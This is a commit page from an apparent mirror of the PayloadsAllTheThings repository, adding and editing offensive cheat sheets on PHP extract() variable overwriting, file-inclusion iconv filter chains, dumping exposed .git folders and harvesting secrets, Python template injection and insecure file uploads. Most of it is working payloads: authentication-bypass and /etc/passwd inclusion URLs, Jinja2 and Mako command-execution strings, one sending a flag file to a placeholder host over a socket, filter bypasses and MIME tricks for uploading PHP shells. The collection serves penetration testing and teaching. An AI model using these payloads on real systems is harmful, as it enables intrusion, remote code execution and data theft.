Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-03-14 13:56:58 +00:00
Code Issues Projects Releases Packages Wiki Activity

External Variable Modification

Browse source
This commit is contained in:
hacker 2025-03-07 12:15:00 +01:00
parent 0e93caed81
commit 64b36854a7
5 changed files with 227 additions and 56 deletions
External Variable Modification
README.md
File Inclusion/Intruders
php-filter-iconv.txt
Insecure Source Code Management
Git.md
Server Side Template Injection
Python.md
Upload Insecure Files
README.md

98
External Variable Modification/README.md Normal file
View file

@ -0,0 +1,98 @@
# External Variable Modification
> External Variable Modification Vulnerability occurs when a web application improperly handles user input, allowing attackers to overwrite internal variables. In PHP, functions like extract($_GET), extract($_POST), or import_request_variables() can be abused if they import user-controlled data into the global scope without proper validation. This can lead to security issues such as unauthorized changes to application logic, privilege escalation, or bypassing security controls.
## Summary
* [Methodology](#methodology)
* [Overwriting Critical Variables](#overwriting-critical-variables)
* [Poisoning File Inclusion](#poisoning-file-inclusion)
* [Global Variable Injection](#global-variable-injection)
* [Remediations](#remediations)
* [References](#references)
## Methodology
The `extract()` function in PHP imports variables from an array into the current symbol table. While it may seem convenient, it can introduce serious security risks, especially when handling user-supplied data.
* It allows overwriting existing variables.
* It can lead to **variable pollution**, impacting security mechanisms.
* It can be used as a **gadget** to trigger other vulnerabilities like Remote Code Execution (RCE) and Local File Inclusion (LFI).
By default, `extract()` uses `EXTR_OVERWRITE`, meaning it **replaces existing variables** if they share the same name as keys in the input array.
### Overwriting Critical Variables
If `extract()` is used in a script that relies on specific variables, an attacker can manipulate them.
```php
<?php
$authenticated = false;
extract($_GET);
if ($authenticated) {
echo "Access granted!";
} else {
echo "Access denied!";
}
?>
```
**Exploitation:**
In this example, the use of `extract($_GET)` allow an attacker to set the `$authenticated` variable to `true`:
```ps1
http://example.com/vuln.php?authenticated=true
http://example.com/vuln.php?authenticated=1
```
### Poisoning File Inclusion
If `extract()` is combined with file inclusion, attackers can control file paths.
```php
<?php
$page = "config.php";
extract($_GET);
include "$page";
?>
```
**Exploitation:**
```ps1
http://example.com/vuln.php?page=../../etc/passwd
```
### Global Variable Injection
:warning: As of PHP 8.1.0, write access to the entire `$GLOBALS` array is no longer supported.
Overwriting `$GLOBALS` when an application calls `extract` function on untrusted value:
```php
extract($_GET);
```
An attacker can manipulate **global variables**:
```ps1
http://example.com/vuln.php?GLOBALS[admin]=1
```
## Remediations
Use `EXTR_SKIP` to prevent overwriting:
```php
extract($_GET, EXTR_SKIP);
```
## References
* [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/473.html)
* [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/621.html)
* [Function extract - PHP Documentation - March 21, 2001](https://www.php.net/manual/en/function.extract.php)
* [$GLOBALS variables - PHP Documentation - April 30, 2008](https://www.php.net/manual/en/reserved.variables.globals.php)
* [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md)
* [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://ctftime.org/writeup/38076)

50
File Inclusion/Intruders/php-filter-iconv.txt Normal file
View file

@ -0,0 +1,50 @@
convert.iconv.437.CP930
convert.iconv.CP1390.CSIBM932
convert.iconv.CP273.CP1122
convert.iconv.CP285.CP280
convert.iconv.CSISO5427CYRILLIC.855
convert.iconv.CSN_369103.CP770
convert.iconv.CSUNICODE.CSUNICODE
convert.iconv.CSUNICODE.UCS-2BE
convert.iconv.ES.IBM037
convert.iconv.ES.IBM930
convert.iconv.IBM037.CP1250
convert.iconv.IBM037.IBM256
convert.iconv.IBM037.IBM280
convert.iconv.IBM037.IBM860
convert.iconv.IBM1122.IBM273
convert.iconv.IBM1137.8859_1
convert.iconv.IBM1141.8859_1
convert.iconv.IBM1141.IBM4517
convert.iconv.IBM1145.IBM850
convert.iconv.IBM1148.EBCDIC-AT-DE-A
convert.iconv.IBM1149.MAC-SAMI
convert.iconv.IBM1390.IBM932
convert.iconv.IBM1390.IBM939
convert.iconv.IBM1399.IBM930
convert.iconv.IBM256.IBM273
convert.iconv.IBM273.CWI
convert.iconv.IBM273.ES
convert.iconv.IBM273.IBM420
convert.iconv.IBM273.IT
convert.iconv.IBM273.PT
convert.iconv.IBM273.US
convert.iconv.IBM277.ISO-8859-9E
convert.iconv.IBM278.IBM861
convert.iconv.IBM278.MIK
convert.iconv.IBM284.IBM278
convert.iconv.IBM297.IBM273
convert.iconv.IBM297.IBM280
convert.iconv.IBM4971.ARMSCII-8
convert.iconv.IBM870.MAC-IS
convert.iconv.L1.UCS-4
convert.iconv.L1.UCS-4LE
convert.iconv.L1.UTF16LE
convert.iconv.L1.utf7
convert.iconv.L1.UTF7
convert.iconv.UCS-4LE.10646-1:1993
convert.iconv.UTF16.UTF16
convert.iconv..UTF7
convert.iconv.UTF8.CP930
convert.iconv.UTF8.IBM1140
convert.iconv.VISCII.MSZ_7795.3

78
Insecure Source Code Management/Git.md
View file

@ -14,12 +14,12 @@
* [GitHack](#githack)
* [GitTools](#gittools)
* [Harvesting secrets](#harvesting-secrets)
* [noseyparker](#noseyparker)
* [trufflehog](#trufflehog)
* [Yar](#yar)
* [Gitrob](#gitrob)
* [Gitleaks](#gitleaks)
* [Refererences]
* [References](#references)
## Methodology
@ -27,22 +27,24 @@ The following examples will create either a copy of the .git or a copy of the cu
Check for the following files, if they exist you can extract the .git folder.
- `.git/config`
- `.git/HEAD`
- `.git/logs/HEAD`
* `.git/config`
* `.git/HEAD`
* `.git/logs/HEAD`
### Recovering file contents from .git/logs/HEAD
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
* Check for 403 Forbidden or directory listing to find the `/.git/` directory
* Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access the commit using the hash
* Access the commit using the hash
```powershell
# create an empty .git repository
git init test
@ -63,20 +65,24 @@ Check for the following files, if they exist you can extract the .git folder.
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
* Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
* Read the data (flag.txt)
```powershell
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
@ -84,10 +90,9 @@ Check for the following files, if they exist you can extract the .git folder.
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
### Recovering file contents from .git/index
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
Use the git index file parser <https://pypi.python.org/pypi/gin> (python3).
```powershell
pip3 install gin
@ -105,7 +110,6 @@ name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
## Tools
### Automatic recovery
@ -113,6 +117,7 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
#### git-dumper.py
* [arthaud/git-dumper](https://github.com/arthaud/git-dumper)
```powershell
pip install -r requirements.txt
./git-dumper.py http://web.site/.git ~/website
@ -175,16 +180,27 @@ GitHack.py http://web.site/.git/
git checkout -- .
```
### Harvesting secrets
#### noseyparker
> [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history.
```ps1
git clone https://github.com/trufflesecurity/test_keys
docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/
docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always
noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
noseyparker scan --datastore np.noseyparker --github-user octocat
```
#### trufflehog
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
pip install truffleHog
truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git
```
#### Yar
@ -211,21 +227,23 @@ gitrob [options] target [target2] ... [targetN]
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
* Run gitleaks against a public repository
```powershell
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
```
* Run gitleaks against a local repository already cloned into /tmp/
```powershell
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
```
* Run gitleaks against a specific Github Pull request
```powershell
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
```
## References
- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)

34
Server Side Template Injection/Python.md
View file

@ -2,7 +2,6 @@
> Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious input into a server-side template, causing arbitrary code execution on the server. In Python, SSTI can occur when using templating engines such as Jinja2, Mako, or Django templates, where user input is included in templates without proper sanitization.
## Summary
- [Templating Libraries](#templating-libraries)
@ -30,12 +29,11 @@
- [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
- [Tornado](#tornado)
- [Tornado - Basic Injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako)
- [Mako - Remote Command Execution](#mako---remote-command-execution)
- [References](#references)
## Templating Libraries
| Template Name | Payload Format |
@ -49,7 +47,6 @@
| Pystache | `{{ }}` |
| Tornado | `{{ }}` |
## Django
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
@ -62,7 +59,6 @@ Django template language supports 2 rendering engines by default: Django Templat
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
```
### Django - Cross-Site Scripting
```python
@ -84,17 +80,17 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
### Django - Admin Site URL leak
```
```python
{% include 'admin/base.html' %}
```
### Django - Admin Username And Password Hash Leak
```
```ps1
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
{% get_admin_log 10 as admin_log for_user user %}
```
---
@ -137,7 +133,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
<pre>{% debug %}</pre>
```
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
Source: <https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement>
### Jinja2 - Dump All Used Classes
@ -202,7 +198,6 @@ def hook(*args, **kwargs):
}}
```
#### Exploit The SSTI By Calling os.popen().read()
```python
@ -225,7 +220,7 @@ We can use these shorter payloads:
{{ namespace.__init__.__globals__.os.popen('id').read() }}
```
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
Source [@podalirius_](https://twitter.com/podalirius_) : <https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/>
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
@ -233,7 +228,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
{{ lipsum.__globals__["os"].popen('id').read() }}
```
Source: https://twitter.com/podalirius_/status/1655970628648697860
Source: <https://twitter.com/podalirius_/status/1655970628648697860>
#### Exploit The SSTI By Calling subprocess.Popen
@ -250,7 +245,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
```
Simply modification of payload to clean up output and facilitate command input (https://twitter.com/SecGus/status/1198976764351066113)
Simply modification of payload to clean up output and facilitate command input (<https://twitter.com/SecGus/status/1198976764351066113>)
In another GET parameter include a variable named "input" that contains the command you want to run (For example: &input=ls)
```python
@ -303,14 +298,14 @@ Bypassing `|join`
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
```
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by <https://twitter.com/SecGus>:
```python
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
```
---
## Tornado
### Tornado - Basic Injection
@ -329,15 +324,11 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
---
## Mako
[Official website](https://www.makotemplates.org/)
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
```python
<%
import os
@ -414,10 +405,9 @@ PoC :
<module 'os' from '/usr/local/lib/python3.10/os.py'>
```
## References
- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)

23
Upload Insecure Files/README.md
View file

@ -95,10 +95,25 @@ Here is a list of the default extensions for web shell pages in the selected lan
MIME type, a MIME type (Multipurpose Internet Mail Extensions type) is a standardized identifier that tells browsers, servers, and applications what kind of file or data is being handled. It consists of a type and a subtype, separated by a slash. Change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` to disguise the content as an image.
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
* Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
* Common images content-types:
```cs
Content-Type: image/gif
Content-Type: image/png
Content-Type: image/jpeg
```
* Content-Type wordlist: [SecLists/web-all-content-types.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt)
```cs
text/php
text/x-php
application/php
application/x-php
application/x-httpd-php
application/x-httpd-php-source
```
* Set the `Content-Type` twice, once for unallowed type and once for allowed.
[Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) - Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.